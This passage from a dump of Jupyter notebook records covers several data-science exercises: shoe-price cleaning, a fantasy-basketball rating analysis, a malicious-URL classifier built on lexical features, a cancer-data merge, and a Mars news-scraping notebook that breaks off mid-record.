"day3.ipynb\n"
],
[
"!mkdir data",
"_____no_output_____"
],
[
"!echo 'data' >.gitignore",
"_____no_output_____"
],
[
"!git add .gitignore",
"_____no_output_____"
],
[
"data = dw.load_dataset('datafiniti/mens-shoe-prices')",
"_____no_output_____"
],
[
"data.dataframes",
"_____no_output_____"
],
[
"df = data.dataframes['7004_1']",
"/usr/local/lib/python3.6/dist-packages/datadotworld/models/dataset.py:209: UserWarning: Unable to set data frame dtypes automatically using 7004_1 schema. Data types may need to be adjusted manually. Error: Integer column has NA values in column 10\n 'Error: {}'.format(resource_name, e))\n/usr/local/lib/python3.6/dist-packages/datadotworld/util.py:121: DtypeWarning: Columns (39,45) have mixed types. Specify dtype option on import or set low_memory=False.\n return self._loader_func()\n"
],
[
"df.head()",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"df.prices_currency.unique()",
"_____no_output_____"
],
[
"df.prices_currency.value_counts()",
"_____no_output_____"
],
[
"df_usd = df[df.prices_currency == 'USD'].copy()",
"_____no_output_____"
],
[
"df_usd['prices_amountmin'] = df_usd.prices_amountmin.astype(np.float)",
"_____no_output_____"
],
[
"filter_max = np.percentile(df_usd.prices_amountmin, 99)\nfilter_max",
"_____no_output_____"
],
[
"df_usd_filter = df_usd[df_usd['prices_amountmin'] < filter_max]",
"_____no_output_____"
],
[
"df_usd_filter.prices_amountmin.hist(bins=50);",
"_____no_output_____"
],
[
"ls",
"\u001b[0m\u001b[01;34mdata\u001b[0m/ HelloGithub.ipynb LICENSE \u001b[01;34mmatrix_one\u001b[0m/ README.md\n"
],
[
"df.to_csv('data/Mens_Shoe_Prices.csv', index=False)",
"_____no_output_____"
],
[
"!git add matrix_one/day3.ipynb",
"day3.ipynb\n"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00f7c3cd08b4455d6ab93478b0106958ffd82d | 294,508 | ipynb | Jupyter Notebook | 03_deep-learning/03_loss_function.ipynb | amenoyoya/julia_ml-tuto | 9c0be0923ea00ca4d1d51c0c6f61f6f2748232be | [
"MIT"
] | null | null | null | 03_deep-learning/03_loss_function.ipynb | amenoyoya/julia_ml-tuto | 9c0be0923ea00ca4d1d51c0c6f61f6f2748232be | [
"MIT"
] | null | null | null | 03_deep-learning/03_loss_function.ipynb | amenoyoya/julia_ml-tuto | 9c0be0923ea00ca4d1d51c0c6f61f6f2748232be | [
"MIT"
] | null | null | null | 230.084375 | 160,682 | 0.8534 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb00faf465b00cc7c73a7034aef537601237e9e8 | 504,186 | ipynb | Jupyter Notebook | analysis/notebooks/strategy_analysis.ipynb | kangliu47/espn-api | 0539dd9863edf27d839dac8d028df25e187c5c6d | [
"MIT"
] | null | null | null | analysis/notebooks/strategy_analysis.ipynb | kangliu47/espn-api | 0539dd9863edf27d839dac8d028df25e187c5c6d | [
"MIT"
] | null | null | null | analysis/notebooks/strategy_analysis.ipynb | kangliu47/espn-api | 0539dd9863edf27d839dac8d028df25e187c5c6d | [
"MIT"
] | null | null | null | 580.191024 | 312,767 | 0.761749 | [
[
[
"import sys\nimport os\n\nproject_root = os.path.abspath(\"../..\")\n# project_root = os.path.abspath(os.path.join(script_path, \"../..\"))\nif project_root not in sys.path:\n sys.path.append(project_root)\n print(f\"Project_root: {project_root}\")\n\n\nimport pandas as pd\nfrom analysis.utils.constants import stats_2021_path, projected_2022_path\n\nprojected_stats = pd.read_csv(projected_2022_path).dropna()\nlast_year_stats = pd.read_csv(stats_2021_path).dropna()\ndata_set = {\"last_year\": last_year_stats, \"projected\": projected_stats}\n\nfrom analysis.player_rating import (\n get_players_pool,\n get_player_ratings,\n combine_player_data,\n get_expected_salary,\n)\n\nn_teams = 13\nplayers_pool = get_players_pool(n_teams=n_teams, n_players=17, over_write=1100)\nrating_projected = get_player_ratings(projected_stats, players_pool=players_pool)\nrating_last_year = get_player_ratings(last_year_stats, players_pool=players_pool)\nplayer_ratings = combine_player_data(\n data_last_year=rating_last_year, data_projected=rating_projected\n)\nplayer_stats = combine_player_data(\n data_last_year=last_year_stats.set_index(\"name\"),\n data_projected=projected_stats.set_index(\"name\"),\n)\n\nfor n_expensive in range(5, 14, 2):\n player_ratings[f\"salary_{n_expensive}\"] = get_expected_salary(\n player_ratings,\n players_per_team=13,\n n_teams=n_teams,\n one_dollar_rank=13 * n_expensive,\n ).round(2)\n",
"Project_root: /Users/kangliu/my_projects/espn-api\n"
]
],
[
[
"## Stats Scarcity Plot",
"_____no_output_____"
]
],
[
[
"import holoviews as hv\nimport hvplot.pandas\nfrom analysis.utils.constants import stats_counts\n\nrating_cols = [\"overall\"]\nsummary_data = (\n pd.concat([player_stats[stats_counts], player_ratings[rating_cols]], axis=1)\n .sort_values(by=\"overall\", ascending=False)\n .round(2)\n .reset_index()\n)\nsummary_data[\"rank\"] = summary_data.index + 1\n\n\ndef get_reverse_cumsum_fraction(col_data):\n this_total = col_data.sum()\n this_resverse_cumsum = this_total - col_data.cumsum()\n return this_resverse_cumsum / this_total\n\n\ndecay_lines = {}\n\nfor col in [\"PTS\", \"AST\", \"REB\", \"3PTM\", \"BLK\", \"STL\"]:\n summary_data[f\"cf_{col}\"] = get_reverse_cumsum_fraction(summary_data[col])\n this_line = summary_data.hvplot.line(x=\"rank\", y=f\"cf_{col}\", label=col)\n decay_lines[col] = this_line\n\nimport holoviews as hv\n\nhv.Overlay(list(decay_lines.values())).opts(\n xlabel=\"Rank\",\n ylabel=\"Fraction\",\n title=\"Stats Scarcity\",\n width=800,\n height=500,\n xlim=(0, 13 * 13),\n ylim=(0.4, 1),\n legend_position=\"bottom_left\",\n)\n\n",
"_____no_output_____"
]
],
[
[
"## Component Scatter",
"_____no_output_____"
]
],
[
[
"x_cols = [\"AST\", \"FTR\"]\ny_cols = [\"BLK\", \"FGR\"]\nsalary_threshold = 35\n\nplot_data = player_ratings.copy().reset_index()\nplot_data[\"x_data\"] = plot_data[x_cols].sum(axis=1)\nplot_data[\"y_data\"] = plot_data[y_cols].sum(axis=1)\nplot_data[\"strategy_focus\"] = plot_data[x_cols + y_cols].sum(axis=1)\n\nfrom analysis.visualization import plot_player_ratings_scatter\n\nstrategy_scatter = plot_player_ratings_scatter(\n player_ratings=plot_data,\n x_col=\"x_data\",\n y_col=\"y_data\",\n color_col=\"strategy_focus\",\n width=600,\n height=400,\n xlabel=\" + \".join(x_cols),\n ylabel=\" + \".join(y_cols),\n)\n\npositive_x = plot_data[\"x_data\"] > 0\npositive_y = plot_data[\"y_data\"] > 0\n\n\nplot_data[\"wasted_value\"] = plot_data[\"overall\"] - plot_data[\"strategy_focus\"]\ntarget_scatter = plot_player_ratings_scatter(\n player_ratings=plot_data,\n x_col=\"overall\",\n y_col=\"wasted_value\",\n width=600,\n height=400,\n)\nwasted_value = plot_data[\"wasted_value\"] > 0\nnot_too_expensive = plot_data[\"salary_13\"] < salary_threshold\nsorted_target = plot_data[wasted_value & not_too_expensive].sort_values(\n by=\"overall\", ascending=False\n)\n\n(strategy_scatter + target_scatter).cols(1)\n",
"_____no_output_____"
],
[
"sleeper_list = [\n \"Cade Cunningham\",\n \"Jalen Suggs\",\n \"Evan Mobley\",\n \"Killian Hayes\",\n \"Scottie Barnes\",\n \"Jordan Poole\",\n]\n\ninjured_list = [\n \"Kawhi Leonard\",\n \"Jonanthan Issac\",\n \"Klay Thompson\",\n]\n\nguard_list = [\n \"Trae Young\",\n \"De'Aaron Fox\",\n \"Jrue Holiday\",\n \"Zach LaVine\",\n \"Shai Gilgeous-Alexander\",\n \"DeMar DeRozan\",\n \"Lonzo Ball\",\n \"Marcus Smart\",\n \"Tyrese Haliburton\",\n \"T.J. McConnell\",\n]\n\nforward_list = [\n \"Domantas Sabonis\",\n \"Brandon Ingram\",\n \"Tobias Harris\",\n \"Joe Harris\",\n \"Duncan Robinson\",\n]\n\ncenter_list = [\n \"Rudy Gobert\",\n \"Deandre Ayton\",\n \"Draymond Green\",\n \"Bam Adebayo\",\n \"Isaiah Stewart\",\n \"Jonas Valanciunas\",\n \"Jakob Poeltl\",\n \"Jarrett Allen\",\n \"Robert Williams III\",\n \"Nerlens Noel\",\n \"Mo Bamba\",\n]\n\ntarget_list = guard_list + center_list + forward_list + sleeper_list\ndraft_targets = plot_data[plot_data[\"name\"].isin(target_list)]\n\nassert (set(target_list) - set(draft_targets[\"name\"])) == set()\nprint(draft_targets.shape[0])\n",
"31\n"
],
[
"# plot_data.sort_values(by=\"AST\", ascending=False).head(10)\n# plot_data[plot_data.name.str.contains(\"Smart\")]\ndraft_targets[[\"name\", \"overall\", \"strategy_focus\", \"salary_5\", \"salary_13\"]]\n",
"_____no_output_____"
]
],
[
[
"## Target Players",
"_____no_output_____"
],
[
"## Salary Projection Plot",
"_____no_output_____"
]
],
[
[
"player_ratings.stats_type.value_counts()",
"_____no_output_____"
],
[
"plot_data = player_ratings.reset_index().copy()\nplot_data[\"rank\"] = plot_data.index + 1\n\noverall_scatter = plot_data.hvplot.scatter(\n x=\"rank\", y=\"overall\", c=\"overall\", s=50, hover_cols=[\"name\", \"overall\"],\n)\noverall_line = plot_data.hvplot.line(\n x=\"rank\", y=\"overall\", hover_cols=[\"name\", \"overall\"]\n)\noverall_plot = overall_line * overall_scatter\n\nsalary_lines = {}\n\nfor n_expensive in range(5, 14, 2):\n this_scatter = plot_data.hvplot.scatter(\n x=\"rank\", y=f\"salary_{n_expensive}\", hover_cols=[\"name\", \"overall\"]\n )\n this_line = plot_data.hvplot.line(\n x=\"rank\", y=f\"salary_{n_expensive}\", hover_cols=[\"name\", \"overall\"]\n )\n salary_lines[n_expensive] = this_scatter * this_line\n\noverall_plot.opts(height=600) + hv.Overlay(list(salary_lines.values())).opts(height=600)\n",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
cb010bec9813f11e7db8f4c43391716f7efbe35c | 292,149 | ipynb | Jupyter Notebook | Malicious URL identifier/malicious-url-detection.ipynb | aayushkumar20/Kaggle-datasets-based-models | df6f3ed5e3f50aa1e8005573551c5d67f0c4229d | [
"MIT"
] | 1 | 2022-01-29T18:05:48.000Z | 2022-01-29T18:05:48.000Z | Malicious URL identifier/malicious-url-detection.ipynb | aayushkumar20/Kaggle-datasets-based-models | df6f3ed5e3f50aa1e8005573551c5d67f0c4229d | [
"MIT"
] | null | null | null | Malicious URL identifier/malicious-url-detection.ipynb | aayushkumar20/Kaggle-datasets-based-models | df6f3ed5e3f50aa1e8005573551c5d67f0c4229d | [
"MIT"
] | null | null | null | 134.879501 | 36,124 | 0.854235 | [
[
[
"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the read-only \"../input/\" directory\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\nimport os\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n for filename in filenames:\n print(os.path.join(dirname, filename))\n\n# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using \"Save & Run All\" \n# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session",
"/kaggle/input/malicious-urls-dataset/malicious_phish.csv\n"
]
],
[
[
"# Installing important modules for proper functioning. #",
"_____no_output_____"
]
],
[
[
"!pip install tld",
"Collecting tld\r\n Downloading tld-0.12.6-py37-none-any.whl (412 kB)\r\n |████████████████████████████████| 412 kB 601 kB/s \r\n\u001b[?25hInstalling collected packages: tld\r\nSuccessfully installed tld-0.12.6\r\n\u001b[33mWARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv\u001b[0m\r\n"
]
],
[
[
"# Importing all required modules #",
"_____no_output_____"
]
],
[
[
"import re\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom colorama import Fore\nfrom urllib.parse import urlparse\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, classification_report, accuracy_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, ExtraTreesClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom tld import get_tld, is_tld\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.metrics import plot_roc_curve",
"_____no_output_____"
]
],
[
[
"# Reading the contents from the imported (csv) file provided by the Kaggle #",
"_____no_output_____"
]
],
[
[
"data = pd.read_csv('/kaggle/input/malicious-urls-dataset/malicious_phish.csv')\ndata.head()",
"_____no_output_____"
],
[
"data.isnull().sum()",
"_____no_output_____"
],
[
"count = data.type.value_counts()\ncount",
"_____no_output_____"
]
],
[
[
"# Checking data types #",
"_____no_output_____"
],
[
"## Counting the numbers of phising, malware, etc types of links from the given csv files ##",
"_____no_output_____"
]
],
[
[
"sns.barplot(x=count.index, y=count)\nplt.xlabel('Types of links')\nplt.ylabel('Counts');",
"_____no_output_____"
]
],
[
[
"# Representing the types of links based on their categories and types #",
"_____no_output_____"
],
[
"## removing 'www\" from the given dataset ##",
"_____no_output_____"
]
],
[
[
"data['url'] = data['url'].replace('www.', '', regex=True)\ndata",
"_____no_output_____"
]
],
[
[
"### Removing (WWW) from the given list and allowing only http:// ###",
"_____no_output_____"
]
],
[
[
"rem = {\"Category\": {\"benign\": 0, \"defacement\": 1, \"phishing\":2, \"malware\":3}}\ndata['Category'] = data['type']\ndata = data.replace(rem)",
"_____no_output_____"
],
[
"data['url_len'] = data['url'].apply(lambda x: len(str(x)))",
"_____no_output_____"
],
[
"def process_tld(url):\n try:\n res = get_tld(url, as_object = True, fail_silently=False,fix_protocol=True)\n pri_domain= res.parsed_url.netloc\n except :\n pri_domain= None\n return pri_domain",
"_____no_output_____"
],
[
"data['domain'] = data['url'].apply(lambda i: process_tld(i))",
"_____no_output_____"
],
[
"data.head()",
"_____no_output_____"
]
],
[
[
"# 👇 extracting number of feature = ['@','?','-','=','.','#','%','+','$','!','*',',','//'] from given data set. #",
"_____no_output_____"
]
],
[
[
"feature = ['@','?','-','=','.','#','%','+','$','!','*',',','//']\nfor a in feature:\n data[a] = data['url'].apply(lambda i: i.count(a))",
"_____no_output_____"
],
[
"def abnormal_url(url):\n hostname = urlparse(url).hostname\n hostname = str(hostname)\n match = re.search(hostname, url)\n if match:\n return 1\n else:\n return 0",
"_____no_output_____"
],
[
"data['abnormal_url'] = data['url'].apply(lambda i: abnormal_url(i))",
"_____no_output_____"
],
[
"sns.countplot(x='abnormal_url', data=data);",
"_____no_output_____"
],
[
"def httpSecure(url):\n htp = urlparse(url).scheme\n match = str(htp)\n if match=='https':\n return 1\n else:\n return 0",
"_____no_output_____"
],
[
"data['https'] = data['url'].apply(lambda i: httpSecure(i))",
"_____no_output_____"
],
[
"sns.countplot(x='https', data=data);",
"_____no_output_____"
]
],
[
[
"# Training the model for realtime use #",
"_____no_output_____"
]
],
[
[
"def digit_count(url):\n digits = 0\n for i in url:\n if i.isnumeric():\n digits = digits + 1\n return digits",
"_____no_output_____"
],
[
"data['digits']= data['url'].apply(lambda i: digit_count(i))",
"_____no_output_____"
],
[
"def letter_count(url):\n letters = 0\n for i in url:\n if i.isalpha():\n letters = letters + 1\n return letters",
"_____no_output_____"
],
[
"data['letters']= data['url'].apply(lambda i: letter_count(i))",
"_____no_output_____"
],
[
"data.head()",
"_____no_output_____"
],
[
"def Shortining_Service(url):\n match = re.search('bit\\.ly|goo\\.gl|shorte\\.st|go2l\\.ink|x\\.co|ow\\.ly|t\\.co|tinyurl|tr\\.im|is\\.gd|cli\\.gs|'\n 'yfrog\\.com|migre\\.me|ff\\.im|tiny\\.cc|url4\\.eu|twit\\.ac|su\\.pr|twurl\\.nl|snipurl\\.com|'\n 'short\\.to|BudURL\\.com|ping\\.fm|post\\.ly|Just\\.as|bkite\\.com|snipr\\.com|fic\\.kr|loopt\\.us|'\n 'doiop\\.com|short\\.ie|kl\\.am|wp\\.me|rubyurl\\.com|om\\.ly|to\\.ly|bit\\.do|t\\.co|lnkd\\.in|'\n 'db\\.tt|qr\\.ae|adf\\.ly|goo\\.gl|bitly\\.com|cur\\.lv|tinyurl\\.com|ow\\.ly|bit\\.ly|ity\\.im|'\n 'q\\.gs|is\\.gd|po\\.st|bc\\.vc|twitthis\\.com|u\\.to|j\\.mp|buzurl\\.com|cutt\\.us|u\\.bb|yourls\\.org|'\n 'x\\.co|prettylinkpro\\.com|scrnch\\.me|filoops\\.info|vzturl\\.com|qr\\.net|1url\\.com|tweez\\.me|v\\.gd|'\n 'tr\\.im|link\\.zip\\.net',\n url)\n if match:\n return 1\n else:\n return 0",
"_____no_output_____"
],
[
"data['Shortining_Service'] = data['url'].apply(lambda x: Shortining_Service(x))",
"_____no_output_____"
],
[
"sns.countplot(x='Shortining_Service', data=data);",
"_____no_output_____"
],
[
"def having_ip_address(url):\n match = re.search(\n '(([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.'\n '([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\/)|' # IPv4\n '(([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.'\n '([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\/)|' # IPv4 with port\n '((0x[0-9a-fA-F]{1,2})\\\\.(0x[0-9a-fA-F]{1,2})\\\\.(0x[0-9a-fA-F]{1,2})\\\\.(0x[0-9a-fA-F]{1,2})\\\\/)' # IPv4 in hexadecimal\n '(?:[a-fA-F0-9]{1,4}:){7}[a-fA-F0-9]{1,4}|'\n '([0-9]+(?:\\.[0-9]+){3}:[0-9]+)|'\n '((?:(?:\\d|[01]?\\d\\d|2[0-4]\\d|25[0-5])\\.){3}(?:25[0-5]|2[0-4]\\d|[01]?\\d\\d|\\d)(?:\\/\\d{1,2})?)', url) # Ipv6\n if match:\n return 1\n else:\n return 0",
"_____no_output_____"
],
[
"data['having_ip_address'] = data['url'].apply(lambda i: having_ip_address(i))",
"_____no_output_____"
],
[
"data[\"having_ip_address\"].value_counts()",
"_____no_output_____"
],
[
"plt.figure(figsize=(15, 15))\nsns.heatmap(data.corr(), linewidths=.5)",
"_____no_output_____"
],
[
"X = data.drop(['url','type','Category','domain'],axis=1)\ny = data['Category']",
"_____no_output_____"
],
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=2)",
"_____no_output_____"
],
[
"models = [DecisionTreeClassifier,RandomForestClassifier,AdaBoostClassifier,KNeighborsClassifier,SGDClassifier,\n ExtraTreesClassifier,GaussianNB]\naccuracy_test=[]\nfor m in models:\n print('Model =>\\033[07m {} \\033[0m'.format(m))\n model_ = m()\n model_.fit(X_train, y_train)\n pred = model_.predict(X_test)\n acc = accuracy_score(pred, y_test)\n accuracy_test.append(acc)\n print('Test Accuracy :\\033[32m \\033[01m {:.2f}% \\033[30m \\033[0m'.format(acc*100))\n print('\\033[01m Classification_report \\033[0m')\n print(classification_report(y_test, pred))\n print('\\033[01m Confusion_matrix \\033[0m')\n cf_matrix = confusion_matrix(y_test, pred)\n plot_ = sns.heatmap(cf_matrix/np.sum(cf_matrix), annot=True,fmt= '0.2%')\n plt.show()\n print('\\033[31m End \\033[0m')",
"Model =>\u001b[07m <class 'sklearn.tree._classes.DecisionTreeClassifier'> \u001b[0m\nTest Accuracy :\u001b[32m \u001b[01m 90.93% \u001b[30m \u001b[0m\n\u001b[01m Classification_report \u001b[0m\n precision recall f1-score support\n\n 0 0.92 0.97 0.94 85565\n 1 0.93 0.96 0.94 19319\n 2 0.80 0.57 0.66 18805\n 3 0.94 0.91 0.93 6550\n\n accuracy 0.91 130239\n macro avg 0.90 0.85 0.87 130239\nweighted avg 0.90 0.91 0.90 130239\n\n\u001b[01m Confusion_matrix \u001b[0m\n"
],
[
"output = pd.DataFrame({\"Model\":['Decision Tree Classifier','Random Forest Classifier',\n 'AdaBoost Classifier','KNeighbors Classifier','SGD Classifier',\n 'Extra Trees Classifier','Gaussian NB'],\n \"Accuracy\":accuracy_test})\n",
"_____no_output_____"
],
[
"plt.figure(figsize=(10, 5))\nplots = sns.barplot(x='Model', y='Accuracy', data=output)\nfor bar in plots.patches:\n plots.annotate(format(bar.get_height(), '.2f'),\n (bar.get_x() + bar.get_width() / 2,\n bar.get_height()), ha='center', va='center',\n size=15, xytext=(0, 8),\n textcoords='offset points')\n\nplt.xlabel(\"Models\", size=14)\nplt.xticks(rotation=20);\nplt.ylabel(\"Accuracy\", size=14)\nplt.show()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb011699e9d633430c55324a42fe0124e44cf946 | 4,589 | ipynb | Jupyter Notebook | Merge_Cancer.ipynb | NCBI-Codeathons/NOVEL-CLINICAL-PREDICTION-APPROACHES-TO-MANAGING-CARE-FOR-ACUTE-PULMONARY-EMBOLISM-PATIENTS | 4d8f5db3ab026c146620b479649f0122b5e776be | [
"MIT"
] | 1 | 2019-11-13T09:10:36.000Z | 2019-11-13T09:10:36.000Z | Merge_Cancer.ipynb | NCBI-Codeathons/NOVEL-CLINICAL-PREDICTION-APPROACHES-TO-MANAGING-CARE-FOR-ACUTE-PULMONARY-EMBOLISM-PATIENTS | 4d8f5db3ab026c146620b479649f0122b5e776be | [
"MIT"
] | null | null | null | Merge_Cancer.ipynb | NCBI-Codeathons/NOVEL-CLINICAL-PREDICTION-APPROACHES-TO-MANAGING-CARE-FOR-ACUTE-PULMONARY-EMBOLISM-PATIENTS | 4d8f5db3ab026c146620b479649f0122b5e776be | [
"MIT"
] | 1 | 2019-11-13T09:10:37.000Z | 2019-11-13T09:10:37.000Z | 28.503106 | 149 | 0.568533 | [
[
[
"import pandas as pd\nimport numpy as np",
"_____no_output_____"
],
[
"#Paths to files\nencounter_path = \"C:\\\\Users\\\\winsk\\\\Desktop\\\\UTSW Data\\\\df_encounter.csv\"\ncancer_path = \"C:\\\\Users\\\\winsk\\\\Desktop\\\\UTSW Data\\\\df_cancer.csv\"",
"_____no_output_____"
],
[
"#Read in dataframes\nencounter_df = pd.read_csv(encounter_path)\ncancer_df = pd.read_csv(cancer_path)",
"_____no_output_____"
],
[
"#function to merge cancer data\ndef merge_cancer(enc_df, cnc_df):\n #Make modifications to cancer df\n mod_cancer_df = cnc_df.copy()\n mod_cancer_df.set_index(\"HSP_ENC\", inplace = True)\n mod_cancer_df.reset_index(level=0, inplace=True)\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown, Missing Remission Date', 'cancer_at_enc'] = 'Unknown'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown, Previously Positive', 'cancer_at_enc'] = 'Unknown'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown, Not Documented', 'cancer_at_enc'] = 'Unknown'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown, Not documented', 'cancer_at_enc'] = 'Unknown'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'No Cancer', 'cancer_at_enc'] = '1'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown', 'cancer_at_enc'] = '2'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Cancer', 'cancer_at_enc'] = '3'\n mod_cancer_df['cancer_at_enc'] = mod_cancer_df['cancer_at_enc'].astype(int)\n mod_cancer_df.drop_duplicates(['PATIENT_ID', 'HSP_ENC'])\n \n #Take only cancer status column with max value\n drop_cancer_df = mod_cancer_df[['HSP_ENC', 'cancer_at_enc']]\n drop_cancer_df = drop_cancer_df.groupby('HSP_ENC',group_keys=False).apply(lambda x: x.loc[x['cancer_at_enc']==x['cancer_at_enc'].max()])\n\n #Merge with encounter df and drop dups\n mergeRes = pd.merge(enc_df, drop_cancer_df, on='HSP_ENC', how='left')\n mergeRes = mergeRes.drop_duplicates('HSP_ENC')\n\n #Replace NaN in encounter df with 0 (Never had cancer)\n mergeRes['cancer_at_enc'].fillna(0, inplace=True)\n \n #Renaming the cancer column\n mergeRes.rename(columns={'cancer_at_enc': 'CANCER_RANK'}, inplace=True)\n \n return mergeRes.reset_index(drop=True)",
"_____no_output_____"
],
[
"out = merge_cancer(encounter_df, cancer_df)",
"_____no_output_____"
],
[
"cancer_grp = out.groupby(['CANCER_RANK']).agg('count')\ncancer_grp_count = cancer_grp.sort_values(['HSP_ENC'], ascending=True)\ncancer_grp_count.iloc[:,1]",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0119dacb32f0f034bc43d06a1911b3a4903f76 | 12,569 | ipynb | Jupyter Notebook | .ipynb_checkpoints/mission_to_mars-checkpoint.ipynb | cgrinstead12/Mission-to-Mars | 9417dc878966bcf38e2fb9bd1ef7c05495d76bf6 | [
"ADSL"
] | null | null | null | .ipynb_checkpoints/mission_to_mars-checkpoint.ipynb | cgrinstead12/Mission-to-Mars | 9417dc878966bcf38e2fb9bd1ef7c05495d76bf6 | [
"ADSL"
] | null | null | null | .ipynb_checkpoints/mission_to_mars-checkpoint.ipynb | cgrinstead12/Mission-to-Mars | 9417dc878966bcf38e2fb9bd1ef7c05495d76bf6 | [
"ADSL"
] | null | null | null | 25.915464 | 550 | 0.506962 | [
[
[
"from splinter import Browser\nfrom bs4 import BeautifulSoup as bs\nimport pymongo\nimport time\nimport pandas as pd",
"_____no_output_____"
],
[
"conn = 'mongodb://localhost:27017'\nclient = pymongo.MongoClient(conn)",
"_____no_output_____"
],
[
"db = client.mars_db\ncollection = db.titles",
"_____no_output_____"
],
[
"executable_path = {\"executable_path\":\"C:/Users/cgrinstead12/Desktop/Mission to Mars/chromedriver.exe\"}\nbrowser = Browser(\"chrome\", **executable_path, headless = False)\nurl = \"https://mars.nasa.gov/news/\"\nbrowser.visit(url)\nhtml = browser.html\nsoup = bs(html,\"html.parser\")",
"_____no_output_____"
],
[
"news_title = soup.find('div', class_='content_title').text\nnews_para = soup.find('div', class_='article_teaser_body').text",
"_____no_output_____"
],
[
"print(news_title)\nprint(news_para)",
"MarCO Makes Space for Small Explorers\nA pair of NASA CubeSats flying to Mars are opening a new frontier for small spacecraft.\n"
],
[
"image_url = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\nbrowser.visit(image_url)",
"_____no_output_____"
],
[
"browser.click_link_by_partial_text('FULL IMAGE')\ntime.sleep(1)\nbrowser.click_link_by_partial_text('more info')",
"_____no_output_____"
],
[
"image_html = browser.html\nsoup = bs(image_html, \"html.parser\")",
"_____no_output_____"
],
[
"image_url = soup.find('img', class_=\"main_image\")['src']",
"_____no_output_____"
],
[
"print(image_url)",
"/spaceimages/images/largesize/PIA18295_hires.jpg\n"
],
[
"main_url = 'https://www.jpl.nasa.gov/'\n\nimage_url_combined = main_url + image_url",
"_____no_output_____"
],
[
"print(image_url_combined)",
"https://www.jpl.nasa.gov//spaceimages/images/largesize/PIA18295_hires.jpg\n"
],
[
"browser.visit(image_url_combined)",
"_____no_output_____"
]
],
[
[
"Step 3 - Twitter Data https://twitter.com/marswxreport?lang=en - Visit the Mars Weather twitter account here and scrape the latest Mars weather tweet from the page. Save the tweet text for the weather report as a variable called mars_weather.",
"_____no_output_____"
]
],
[
[
"url = 'https://twitter.com/marswxreport?lang=en'\nbrowser.visit(url)",
"_____no_output_____"
],
[
"twitter_html = browser.html\nsoup = bs(twitter_html, \"html.parser\")",
"_____no_output_____"
],
[
"mars_weather = soup.find('p', class_=\"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\").text",
"_____no_output_____"
],
[
"print(mars_weather)",
"Sol 2169 (2018-09-12), high -10C/14F, low -70C/-93F, pressure at 8.82 hPa, daylight 05:41-17:58\n"
]
],
[
[
"Mars Facts\n\nVisit the Mars Facts webpage here and use Pandas to scrape the table containing facts about the planet including Diameter, Mass, etc.\n\nUse Pandas to convert the data to a HTML table string.",
"_____no_output_____"
]
],
[
[
"url = \"https://space-facts.com/mars/\"\nbrowser.visit(url)",
"_____no_output_____"
],
[
